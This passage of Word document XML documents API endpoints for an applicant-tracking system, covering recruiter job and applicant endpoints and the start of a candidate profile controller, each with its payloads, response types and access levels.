          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Controller: RecruiterController.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Base URI Mapping: /api/recruiter | Primary Domain: Enterprise ATS Requisitions &amp; Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Injected Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>JobService, ApplicationService, RecruiterService, AnalyticsService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2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Method &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Response Code / DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Access Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Execution Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/recruiter/my-jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / List&lt;RecruiterJobDto&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Returns all requisitions created by logged-in recruiter with live applicant counts per stage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/recruiter/jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JobCreateDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>201 Created / JobDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Creates new job vacancy mapped to recruiter's assigned enterprise company.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/recruiter/jobs/{id}/applicants</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: jobId, Query: stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / List&lt;ApplicantDto&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Retrieves applicants ranked by match score with resume links and contact details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUT /api/recruiter/applications/{id}/status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: id, { status }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / ApplicationDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Advances candidate across ATS stages (SCREENING -&gt; SHORTLISTED -&gt; INTERVIEW -&gt; OFFER -&gt; HIRED/REJECTED).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/recruiter/jobs/{id}/export-applicants</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / text/csv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Generates dynamic CSV roster of all candidates with contact info and match scores for external ATS sync.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Controller: CandidateProfileController.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Base URI Mapping: /api/profiles | Primary Domain: Candidate Resume &amp; Skills Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Injected Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>CandidateProfileService, UserService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2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Method &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Response Code / DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Access Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Execution Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/profiles/me</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / CandidateProfileDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Returns candidate bio, experience, expected salary, resume URL, and verified skill set.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
